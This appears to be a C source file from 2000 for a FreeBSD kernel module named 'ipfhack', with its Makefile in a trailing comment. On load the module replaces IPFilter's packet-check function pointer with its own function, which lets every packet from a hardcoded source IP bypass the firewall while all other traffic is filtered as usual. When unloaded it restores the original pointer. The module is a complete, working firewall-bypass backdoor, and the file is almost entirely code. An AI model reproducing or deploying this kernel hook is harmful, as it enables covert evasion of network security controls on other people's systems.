/*
 * Name: Filtering IPFiLTER
 * Date: Thu May 18 11:00:59 2000
 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
 *
 * SoftProject 2000 - Digital Sekurity for Y2k
 * Sikurezza.org - Italian Security MailingList
 *
 * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
 * Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
 *
 * Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #7: Sun May i386
 *
 * IPFilter (like ipfw) uses a function pointer in ip_input() and ip_output() 
 * in order to process packets ... 
 *
 * if(fr_checkp) {
 * 	struct mbuf *m1 = m;
 * 	
 * 	if((*fr_checkp)(ip, hlen, m->m_pkthdr.rcvif, 0, &m1) || !m1)
 * 		return;
 * 	ip = mtod(m=m1, struct ip *);
 * }
 *
 * I give you a Makefile in append so don't write me for that !!! :)
 */


#define GO_JOHNNY_GO 		"192.168.1.3"	
/* Packets sent by this ip wouldn't process */

#include <sys/param.h>
#include <sys/systm.h>
#include <sys/malloc.h>
#include <sys/mbuf.h>
#include <sys/kernel.h>
#include <sys/proc.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>



/* IPFILTER FreeBSD Options */

typedef struct ip	ip_t;
typedef struct mbuf	mb_t;

/* A simple typedef for filter check prototypes */

typedef int ipfr_t	__P((ip_t *, int, void *, int, mb_t **));

/* Prototypes */

static int  	 s_load	 		__P((struct module *, int, void *));
static u_int32_t inaton			__P((const char *));
extern ipfr_t 	 *fr_checkp;
static ipfr_t	 myfr, *fr;

/* module handler */

static int
s_load (struct module *module, int cmd, void *arg)
{
	int s;

	switch(cmd) {
		case MOD_LOAD:
			s = splnet();
			fr = fr_checkp;
			fr_checkp = myfr;
		       	splx(s);
			break;
			
		case MOD_UNLOAD:
			s = splnet();
			fr_checkp = fr;
			splx(s);
			break;
	}

 	return 0;
}

/* module struct */

static moduledata_t s_mod_1 = {
	        "ipfil_mod",
	        s_load,
	        0
};


DECLARE_MODULE(ipfil_mod, s_mod_1, SI_SUB_PSEUDO, SI_ORDER_ANY);

static int
myfr(ip_t *ip, int hlen, void *ifp, int out, mb_t **mp)
{
	if(ip->ip_src.s_addr == inaton(GO_JOHNNY_GO)) 
		return 0;
		
	return(fr(ip, hlen, ifp, out, mp));
}


static u_int32_t 
inaton(const char *str)
{
	unsigned long l;
	unsigned int val;
	int i;

	l = 0;

	for(i=0; i < 4; i++) {
		l <<= 8;
		if(*str != '\0') {
			val = 0;
			while(*str != '\0' && *str != '.') {
				val *= 10;
				val += *str - '0';
				str++;
			}
			l |= val;
			if(*str != '\0')
				str++;
		}
	}
	return(htonl(l));
}
/*
# SoftProject 2000 - Digital Sekurity for Y2k
# Sikurezza.org - Italian Security MailingList
#
# COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
# Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
#
# Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #3: Thu Mar i386
# < pigpen@s0ftpj.org > 

.PATH: /sys/kern
SRCS	= ipfhack.c 
CFLAGS+= -I/sys
KMOD	= ipfhack 
NOMAN	= t
KLDMOD	= t

KLDLOAD		= /sbin/kldload
KLDUNLOAD	= /sbin/kldunload

CLEANFILES+= ${KMOD}

load:
	${KLDLOAD} -v ./${KMOD}

unload:
	${KLDUNLOAD} -v -n ${KMOD}

.include <bsd.kmod.mk>
*/